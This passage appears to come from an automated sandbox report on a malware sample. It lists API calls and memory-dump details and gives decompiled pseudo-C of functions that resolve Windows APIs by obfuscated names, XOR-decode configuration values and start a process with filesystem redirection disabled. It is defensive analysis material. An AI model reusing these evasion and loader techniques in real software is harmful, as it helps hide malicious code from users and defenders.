                        • lstrlen.KERNEL32(?), ref: 00507707
                        • lstrlen.KERNEL32(?), ref: 0050770E
                        • lstrlenW.KERNEL32(?), ref: 00507715
                          • Part of subcall function 00502A03: RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrlen$CountFreeHeapTick
                        • String ID: -tP
                        • API String ID: 2535036572-4025278887
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E00507836(void* __eax, void* __ecx) {
                        				long _v8;
                        				void* _v12;
                        				void* _v16;
                        				void* _v28;
                        				long _v32;
                        				void _v104;
                        				char _v108;
                        				long _t39;
                        				intOrPtr _t43;
                        				intOrPtr _t50;
                        				void* _t52;
                        				intOrPtr _t53;
                        				void* _t61;
                        				intOrPtr* _t66;
                        				intOrPtr* _t73;
                        				intOrPtr* _t76;
                        
                        				_t71 =  *((intOrPtr*)(__eax + 0x14));
                        				_t39 = E005071A3(__ecx,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x14)) + 0xc)),  &_v12,  &_v16);
                        				_v8 = _t39;
                        				if(_t39 != 0) {
                        					L12:
                        					return _v8;
                        				}
                        				E00507973( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
                        				_t43 = _v12(_v12);
                        				_v8 = _t43;
                        				if(_t43 == 0 && ( *0x50a2b8 & 0x00000001) != 0) {
                        					_v32 = 0;
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					_v108 = 0;
                        					memset( &_v104, 0, 0x40);
                        					_t50 =  *0x50a2d0; // 0x2add5a8
                        					_t18 = _t50 + 0x50b55b; // 0x73797325
                        					_t52 = E00501000(_t18);
                        					_v12 = _t52;
                        					if(_t52 == 0) {
                        						_v8 = 8;
                        					} else {
                        						_t53 =  *0x50a2d0; // 0x2add5a8
                        						_t20 = _t53 + 0x50b73d; // 0x2fe8ce5
                        						_t21 = _t53 + 0x50b0af; // 0x4e52454b
                        						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                        						if(_t66 == 0) {
                        							_v8 = 0x7f;
                        						} else {
                        							_t73 = __imp__;
                        							_v108 = 0x44;
                        							 *_t73(0);
                        							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
                        							 *_t73(1);
                        							if(_t61 == 0) {
                        								_v8 = GetLastError();
                        							} else {
                        								CloseHandle(_v28);
                        								CloseHandle(_v32);
                        							}
                        						}
                        						HeapFree( *0x50a290, 0, _v12);
                        					}
                        				}
                        				_t76 = _v16;
                        				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
                        				E00502A03(_t76);
                        				goto L12;
                        			}


                        APIs
                          • Part of subcall function 005071A3: GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,00507852,?,?,?,?,00000000,00000000), ref: 005071C8
                          • Part of subcall function 005071A3: GetProcAddress.KERNEL32(00000000,7243775A), ref: 005071EA
                          • Part of subcall function 005071A3: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00507200
                          • Part of subcall function 005071A3: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00507216
                          • Part of subcall function 005071A3: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 0050722C
                          • Part of subcall function 005071A3: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00507242
                        • memset.NTDLL ref: 005078A0
                          • Part of subcall function 00501000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00504F1C,73797325), ref: 00501011
                          • Part of subcall function 00501000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0050102B
                        • GetModuleHandleA.KERNEL32(4E52454B,02FE8CE5,73797325), ref: 005078D7
                        • GetProcAddress.KERNEL32(00000000), ref: 005078DE
                        • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 005078F8
                        • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00507916
                        • CloseHandle.KERNEL32(00000000), ref: 00507925
                        • CloseHandle.KERNEL32(?), ref: 0050792A
                        • GetLastError.KERNEL32 ref: 0050792E
                        • HeapFree.KERNEL32(00000000,?), ref: 0050794A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                        • String ID: 8sP
                        • API String ID: 91923200-3124762363
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E0050374B(int* __ecx) {
                        				char _v8;
                        				void* _v12;
                        				void* __esi;
                        				signed int _t20;
                        				signed int _t25;
                        				char* _t31;
                        				char* _t32;
                        				char* _t33;
                        				char* _t34;
                        				char* _t35;
                        				void* _t36;
                        				void* _t37;
                        				intOrPtr _t38;
                        				signed int _t44;
                        				void* _t46;
                        				void* _t47;
                        				signed int _t49;
                        				signed int _t53;
                        				signed int _t57;
                        				signed int _t61;
                        				signed int _t65;
                        				signed int _t69;
                        				void* _t74;
                        				intOrPtr _t90;
                        
                        				_t75 = __ecx;
                        				_t20 =  *0x50a2cc; // 0x63699bc3
                        				_t1 =  &_v8; // 0x502f44
                        				if(E00503D6B( &_v12, _t1, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x110) {
                        					 *0x50a320 = _v12;
                        				}
                        				_t25 =  *0x50a2cc; // 0x63699bc3
                        				_t5 =  &_v8; // 0x502f44
                        				if(E00503D6B( &_v12, _t5, _t25 ^ 0xecd84622) == 0) {
                        					_push(2);
                        					_pop(0);
                        					goto L48;
                        				} else {
                        					_t74 = _v12;
                        					if(_t74 == 0) {
                        						_t31 = 0;
                        					} else {
                        						_t69 =  *0x50a2cc; // 0x63699bc3
                        						_t31 = E0050257B(_t75, _t74, _t69 ^ 0x724e87bc);
                        					}
                        					if(_t31 != 0) {
                        						_t8 =  &_v8; // 0x502f44
                        						_t75 = _t8;
                        						if(StrToIntExA(_t31, 0, _t8) != 0) {
                        							_t9 =  &_v8; // 0x502f44
                        							 *0x50a298 =  *_t9;
                        						}
                        					}
                        					if(_t74 == 0) {
                        						_t32 = 0;
                        					} else {
                        						_t65 =  *0x50a2cc; // 0x63699bc3
                        						_t32 = E0050257B(_t75, _t74, _t65 ^ 0x2b40cc40);
                        					}
                        					if(_t32 != 0) {
                        						_t10 =  &_v8; // 0x502f44
                        						_t75 = _t10;
                        						if(StrToIntExA(_t32, 0, _t10) != 0) {
                        							_t11 =  &_v8; // 0x502f44
                        							 *0x50a29c =  *_t11;
                        						}
                        					}
                        					if(_t74 == 0) {
                        						_t33 = 0;
                        					} else {
                        						_t61 =  *0x50a2cc; // 0x63699bc3
                        						_t33 = E0050257B(_t75, _t74, _t61 ^ 0x3b27c2e6);
                        					}
                        					if(_t33 != 0) {
                        						_t12 =  &_v8; // 0x502f44
                        						_t75 = _t12;
                        						if(StrToIntExA(_t33, 0, _t12) != 0) {
                        							_t13 =  &_v8; // 0x502f44
                        							 *0x50a2a0 =  *_t13;
                        						}
                        					}
                        					if(_t74 == 0) {
                        						_t34 = 0;
                        					} else {
                        						_t57 =  *0x50a2cc; // 0x63699bc3
                        						_t34 = E0050257B(_t75, _t74, _t57 ^ 0x0602e249);
                        					}
                        					if(_t34 != 0) {
                        						_t14 =  &_v8; // 0x502f44
                        						_t75 = _t14;
                        						if(StrToIntExA(_t34, 0, _t14) != 0) {
                        							_t15 =  &_v8; // 0x502f44
                        							 *0x50a004 =  *_t15;
                        						}
                        					}
                        					if(_t74 == 0) {
                        						_t35 = 0;
                        					} else {
                        						_t53 =  *0x50a2cc; // 0x63699bc3
                        						_t35 = E0050257B(_t75, _t74, _t53 ^ 0x3603764c);
                        					}
                        					if(_t35 != 0) {
                        						_t16 =  &_v8; // 0x502f44
                        						_t75 = _t16;
                        						if(StrToIntExA(_t35, 0, _t16) != 0) {
                        							_t17 =  &_v8; // 0x502f44
                        							 *0x50a02c =  *_t17;
                        						}
                        					}
                        					if(_t74 == 0) {
                        						_t36 = 0;
                        					} else {
                        						_t49 =  *0x50a2cc; // 0x63699bc3
                        						_t36 = E0050257B(_t75, _t74, _t49 ^ 0x2cc1f2fd);
                        					}
                        					if(_t36 != 0) {
                        						_push(_t36);
                        						_t46 = 0x10;
                        						_t47 = E00505A4E(_t46);
                        						if(_t47 != 0) {
                        							_push(_t47);
                        							E0050461D();
                        						}
                        					}
                        					if(_t74 == 0) {
                        						_t37 = 0;
                        					} else {
                        						_t44 =  *0x50a2cc; // 0x63699bc3
                        						_t37 = E0050257B(_t75, _t74, _t44 ^ 0xb30fc035);
                        					}
                        					if(_t37 != 0 && E00505A4E(0, _t37) != 0) {
                        						_t90 =  *0x50a37c; // 0x2fe9630
                        						E00506027(_t90 + 4, _t42);
                        					}
                        					_t38 =  *0x50a2d0; // 0x2add5a8
                        					_t18 = _t38 + 0x50b2d2; // 0x2fe887a
                        					_t19 = _t38 + 0x50b7c4; // 0x6976612e
                        					 *0x50a31c = _t18;
                        					 *0x50a390 = _t19;
                        					HeapFree( *0x50a290, 0, _t74);
                        					L48:
                        					return 0;
                        				}
                        			}


                        APIs
                        • StrToIntExA.SHLWAPI(00000000,00000000,D/P,?,D/P,63699BC3,?,D/P,63699BC3,E8FA7DD7,0050A00C,745EC740,?,?,00502F44), ref: 005037D0
                        • StrToIntExA.SHLWAPI(00000000,00000000,D/P,?,D/P,63699BC3,?,D/P,63699BC3,E8FA7DD7,0050A00C,745EC740,?,?,00502F44), ref: 00503802
                        • StrToIntExA.SHLWAPI(00000000,00000000,D/P,?,D/P,63699BC3,?,D/P,63699BC3,E8FA7DD7,0050A00C,745EC740,?,?,00502F44), ref: 00503834
                        • StrToIntExA.SHLWAPI(00000000,00000000,D/P,?,D/P,63699BC3,?,D/P,63699BC3,E8FA7DD7,0050A00C,745EC740,?,?,00502F44), ref: 00503866
                        • StrToIntExA.SHLWAPI(00000000,00000000,D/P,?,D/P,63699BC3,?,D/P,63699BC3,E8FA7DD7,0050A00C,745EC740,?,?,00502F44), ref: 00503898
                        • HeapFree.KERNEL32(00000000,?,?,D/P,63699BC3,?,D/P,63699BC3,E8FA7DD7,0050A00C,745EC740,?,?,00502F44), ref: 00503934
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: FreeHeap
                        • String ID: D/P
                        • API String ID: 3298025750-4054160791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • __CxxThrowException@8.LIBCMT ref: 6C540BC4
                        • __CxxThrowException@8.LIBCMT ref: 6C540BF0
                        • __CxxThrowException@8.LIBCMT ref: 6C540C18
                        • __CxxThrowException@8.LIBCMT ref: 6C540C40
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Exception@8Throw
                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                        • API String ID: 2005118841-1866435925
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • __EH_prolog3.LIBCMT ref: 6C542969
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C542973
                          • Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011
                          • Part of subcall function 6C53EB90: std::_Lockit::_Lockit.LIBCPMT ref: 6C53EB9F
                        • codecvt.LIBCPMT ref: 6C5429AD
                        • std::bad_exception::bad_exception.LIBCMT ref: 6C5429C1
                        • __CxxThrowException@8.LIBCMT ref: 6C5429CF
                        • std::_Facet_Register.LIBCPMT ref: 6C5429E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
                        • String ID: bad cast
                        • API String ID: 1512642153-3145022300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • _localeconv.LIBCMT ref: 6C53FC53
                        • __Getcvt.LIBCPMT ref: 6C53FC61
                          • Part of subcall function 6C542252: ____lc_codepage_func.LIBCMT ref: 6C542269
                          • Part of subcall function 6C542252: ____mb_cur_max_func.LIBCMT ref: 6C542272
                          • Part of subcall function 6C542252: ____lc_locale_name_func.LIBCMT ref: 6C54227A
                        • __Getcvt.LIBCPMT ref: 6C53FCBC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Getcvt$____lc_codepage_func____lc_locale_name_func____mb_cur_max_func_localeconv
                        • String ID: ,$false$true
                        • API String ID: 3073657462-760133229
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                          • Part of subcall function 6C54C407: __getptd_noexit.LIBCMT ref: 6C54C408
                          • Part of subcall function 6C54C407: __amsg_exit.LIBCMT ref: 6C54C415
                        • RtlEncodePointer.NTDLL(00000000), ref: 6C5461D8
                        • _CallSETranslator.LIBCMT ref: 6C54620E
                        • _GetRangeOfTrysToCheck.LIBCMT ref: 6C546238
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: CallCheckEncodePointerRangeTranslatorTrys__amsg_exit__getptd_noexit
                        • String ID: MOC$RCC$=b
                        • API String ID: 3119380580-92667700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C53E03D
                          • Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C53E063
                        • std::bad_exception::bad_exception.LIBCMT ref: 6C53E0E7
                        • __CxxThrowException@8.LIBCMT ref: 6C53E0F6
                        • std::_Facet_Register.LIBCPMT ref: 6C53E10D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
                        • String ID: bad cast
                        • API String ID: 153433846-3145022300
                        • Opcode ID: a1c577e7a7fe06a0d8f3e36c08da0fc5a40986e460d3028bc25f038202eebf3a
                        • Instruction ID: 24a92fc28ffa20d1ed09a0231849950d761a9d1c9887f73e1b4ecd0fbfc30e3c
                        • Opcode Fuzzy Hash: a1c577e7a7fe06a0d8f3e36c08da0fc5a40986e460d3028bc25f038202eebf3a
                        • Instruction Fuzzy Hash: AE31C532508220CFCB10CF24CC90B5AB7F5EB89728F054A19E85997B91E775ED05CBD2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C53DF0D
                          • Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C53DF33
                        • std::bad_exception::bad_exception.LIBCMT ref: 6C53DFB7
                        • __CxxThrowException@8.LIBCMT ref: 6C53DFC6
                        • std::_Facet_Register.LIBCPMT ref: 6C53DFDD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
                        • String ID: bad cast
                        • API String ID: 153433846-3145022300
                        • Opcode ID: 6e511c3f4308784bb198772bdeab7a2bfec85ee58d8fe09a2b453b4d99a871b2
                        • Instruction ID: 6b89a0006f1cd8ad394a4d0d3db7ddc34f10d4aa20033ce2df97baf30461c1f4
                        • Opcode Fuzzy Hash: 6e511c3f4308784bb198772bdeab7a2bfec85ee58d8fe09a2b453b4d99a871b2
                        • Instruction Fuzzy Hash: 0A31C371518220DFCB11CF28CC84B5AB7F5EB8A728F154619E85997B91E730ED09CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 32%
                        			E005063CD(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                        				intOrPtr _v36;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				intOrPtr _v52;
                        				void _v60;
                        				char _v64;
                        				long _t18;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				long _t29;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				intOrPtr* _t32;
                        
                        				_t30 = __edi;
                        				_t29 = _a4;
                        				_t31 = __eax;
                        				_t18 = E00502BF3(_t29, __edi, __eax);
                        				_a4 = _t18;
                        				if(_t18 != 0) {
                        					memset( &_v60, 0, 0x38);
                        					_t22 =  *0x50a2d0; // 0x2add5a8
                        					_v64 = 0x3c;
                        					if(_a8 == 0) {
                        						_t7 = _t22 + 0x50b4e0; // 0x70006f
                        						_t23 = _t7;
                        					} else {
                        						_t6 = _t22 + 0x50b92c; // 0x750072
                        						_t23 = _t6;
                        					}
                        					_v36 = _t31;
                        					_t32 = __imp__;
                        					_v52 = _t23;
                        					_v48 = _t29;
                        					_v44 = _t30;
                        					 *_t32(0);
                        					_push( &_v64);
                        					if( *0x50a100() != 0) {
                        						_a4 = _a4 & 0x00000000;
                        					} else {
                        						_a4 = GetLastError();
                        					}
                        					 *_t32(1);
                        				}
                        				return _a4;
                        			}

















                        APIs
                          • Part of subcall function 00502BF3: SysAllocString.OLEAUT32(?), ref: 00502C4F
                          • Part of subcall function 00502BF3: SysAllocString.OLEAUT32(0070006F), ref: 00502C63
                          • Part of subcall function 00502BF3: SysAllocString.OLEAUT32(00000000), ref: 00502C75
                          • Part of subcall function 00502BF3: SysFreeString.OLEAUT32(00000000), ref: 00502CD9
                        • memset.NTDLL ref: 005063F1
                        • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0050642D
                        • GetLastError.KERNEL32 ref: 0050643D
                        • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 0050644E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                        • String ID: <$@{P
                        • API String ID: 593937197-1520035578
                        • Opcode ID: 01a47f2c35e04220862c7d5b9a9ef090416526b905c9dce56481035118618dee
                        • Instruction ID: fe2f56cb0a653fd84fd54a4d5280f3d3b7133c226fb132ab407d529db7eeceef
                        • Opcode Fuzzy Hash: 01a47f2c35e04220862c7d5b9a9ef090416526b905c9dce56481035118618dee
                        • Instruction Fuzzy Hash: 75110C71900218ABDB10DFA5D8C9BDD7FF8BB08384F048426F905EB291E7749504CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SysAllocString.OLEAUT32(?), ref: 00502C4F
                        • SysAllocString.OLEAUT32(0070006F), ref: 00502C63
                        • SysAllocString.OLEAUT32(00000000), ref: 00502C75
                        • SysFreeString.OLEAUT32(00000000), ref: 00502CD9
                        • SysFreeString.OLEAUT32(00000000), ref: 00502CE8
                        • SysFreeString.OLEAUT32(00000000), ref: 00502CF3
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: String$AllocFree
                        • String ID:
                        • API String ID: 344208780-0
                        • Opcode ID: 0c91d17674c1e2fc262378a4024044599d3d28486ec5953ac328d8ac293b65d1
                        • Instruction ID: ee146c1de70f8ebfa8d02586fabdf9c168a44d30c4df84567ab85c1ac5b9c067
                        • Opcode Fuzzy Hash: 0c91d17674c1e2fc262378a4024044599d3d28486ec5953ac328d8ac293b65d1
                        • Instruction Fuzzy Hash: 2D314F32D00A09ABDB01DFA8C94DA9FBBB6BF49300F144465ED11EB161DB719E0ACB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E005071A3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                        				intOrPtr _v8;
                        				intOrPtr _t23;
                        				intOrPtr _t26;
                        				_Unknown_base(*)()* _t28;
                        				intOrPtr _t30;
                        				_Unknown_base(*)()* _t32;
                        				intOrPtr _t33;
                        				_Unknown_base(*)()* _t35;
                        				intOrPtr _t36;
                        				_Unknown_base(*)()* _t38;
                        				intOrPtr _t39;
                        				_Unknown_base(*)()* _t41;
                        				intOrPtr _t44;
                        				struct HINSTANCE__* _t48;
                        				intOrPtr _t54;
                        
                        				_t54 = E00505C4E(0x20);
                        				if(_t54 == 0) {
                        					_v8 = 8;
                        				} else {
                        					_t23 =  *0x50a2d0; // 0x2add5a8
                        					_t1 = _t23 + 0x50b11a; // 0x4c44544e
                        					_t48 = GetModuleHandleA(_t1);
                        					_t26 =  *0x50a2d0; // 0x2add5a8
                        					_t2 = _t26 + 0x50b787; // 0x7243775a
                        					_v8 = 0x7f;
                        					_t28 = GetProcAddress(_t48, _t2);
                        					 *(_t54 + 0xc) = _t28;
                        					if(_t28 == 0) {
                        						L8:
                        						E00502A03(_t54);
                        					} else {
                        						_t30 =  *0x50a2d0; // 0x2add5a8
                        						_t5 = _t30 + 0x50b774; // 0x614d775a
                        						_t32 = GetProcAddress(_t48, _t5);
                        						 *(_t54 + 0x10) = _t32;
                        						if(_t32 == 0) {
                        							goto L8;
                        						} else {
                        							_t33 =  *0x50a2d0; // 0x2add5a8
                        							_t7 = _t33 + 0x50b797; // 0x6e55775a
                        							_t35 = GetProcAddress(_t48, _t7);
                        							 *(_t54 + 0x14) = _t35;
                        							if(_t35 == 0) {
                        								goto L8;
                        							} else {
                        								_t36 =  *0x50a2d0; // 0x2add5a8
                        								_t9 = _t36 + 0x50b756; // 0x4e6c7452
                        								_t38 = GetProcAddress(_t48, _t9);
                        								 *(_t54 + 0x18) = _t38;
                        								if(_t38 == 0) {
                        									goto L8;
                        								} else {
                        									_t39 =  *0x50a2d0; // 0x2add5a8
                        									_t11 = _t39 + 0x50b7ac; // 0x6c43775a
                        									_t41 = GetProcAddress(_t48, _t11);
                        									 *(_t54 + 0x1c) = _t41;
                        									if(_t41 == 0) {
                        										goto L8;
                        									} else {
                        										 *((intOrPtr*)(_t54 + 4)) = _a4;
                        										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                        										_t44 = E0050225C(_t54, _a8);
                        										_v8 = _t44;
                        										if(_t44 != 0) {
                        											goto L8;
                        										} else {
                        											 *_a12 = _t54;
                        										}
                        									}
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _v8;
                        			}



















                        APIs
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        • GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,00507852,?,?,?,?,00000000,00000000), ref: 005071C8
                        • GetProcAddress.KERNEL32(00000000,7243775A), ref: 005071EA
                        • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00507200
                        • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00507216
                        • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 0050722C
                        • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00507242
                          • Part of subcall function 0050225C: memset.NTDLL ref: 005022DB
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: AddressProc$AllocateHandleHeapModulememset
                        • String ID:
                        • API String ID: 1886625739-0
                        • Opcode ID: 47d777901c29a130a9a92938fae52d53ce8014372814bdc8f26deca820c47c9d
                        • Instruction ID: 425f9ac93dd1a0174db98f77a7e9111afd3112486fd9861972959109a18d4b68
                        • Opcode Fuzzy Hash: 47d777901c29a130a9a92938fae52d53ce8014372814bdc8f26deca820c47c9d
                        • Instruction Fuzzy Hash: AD21F9B550470AAFDB20DFA9CE84E6E7BECFB58340B0145A5B805C7261E731E909DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: CurrentThread__calloc_crt__initptd__mtinitlocks__mtterm
                        • String ID:
                        • API String ID: 2314865971-0
                        • Opcode ID: 7fa9ce45af2ec6482d4151b97cfcc817b04ce953337f276aa2dae583f31a88ce
                        • Instruction ID: 450b48cbd1d5bf3d31011e6910bc922675441b8ffd56e78f29fa017a9fcd88cb
                        • Opcode Fuzzy Hash: 7fa9ce45af2ec6482d4151b97cfcc817b04ce953337f276aa2dae583f31a88ce
                        • Instruction Fuzzy Hash: DBF02B326196519EEA247A746C016DF3ED08FC27B8F21C61AE060D5FD0FF11BC4D92A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ____lc_codepage_func.LIBCMT ref: 6C5421EA
                        • __calloc_crt.LIBCMT ref: 6C5421FB
                          • Part of subcall function 6C547076: __calloc_impl.LIBCMT ref: 6C547085
                        • ___pctype_func.LIBCMT ref: 6C54220E
                        • _memmove.LIBCMT ref: 6C542217
                        • ___pctype_func.LIBCMT ref: 6C542228
                        • ____lc_locale_name_func.LIBCMT ref: 6C542234
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                        • String ID:
                        • API String ID: 1321936363-0
                        • Opcode ID: 8d6311f69feffcaa9524e7c25394635f42cf47d37fc1137e5c74f253cb285a3a
                        • Instruction ID: dd036db6073648b4b921246560563bc2f7dccf9fa799ff66045b81171161632a
                        • Opcode Fuzzy Hash: 8d6311f69feffcaa9524e7c25394635f42cf47d37fc1137e5c74f253cb285a3a
                        • Instruction Fuzzy Hash: 52F0A971544B01EBE7109FA5AC09B86B7D4AF40359F10C82DE598CBB80EBB5E8448B51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C5404D3
                          • Part of subcall function 6C543E01: _malloc.LIBCMT ref: 6C543E19
                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C540507
                        • _memmove.LIBCMT ref: 6C54057B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception$_malloc_memmove
                        • String ID: string too long
                        • API String ID: 4023115364-2556327735
                        • Opcode ID: 328f56d0a355aecfea1c6635686e23498e51967527770bfdf0ed9e88d1548f91
                        • Instruction ID: 3f3128896fdc98e9325244940e7c7e56eb08946a64dd683fd655f9b03fcfda5a
                        • Opcode Fuzzy Hash: 328f56d0a355aecfea1c6635686e23498e51967527770bfdf0ed9e88d1548f91
                        • Instruction Fuzzy Hash: 2751E9327012518BD7248E2CAC50A5BB3A5EFE1714F308D2FE592CBF81D761E845C7A2
                        Uniqueness

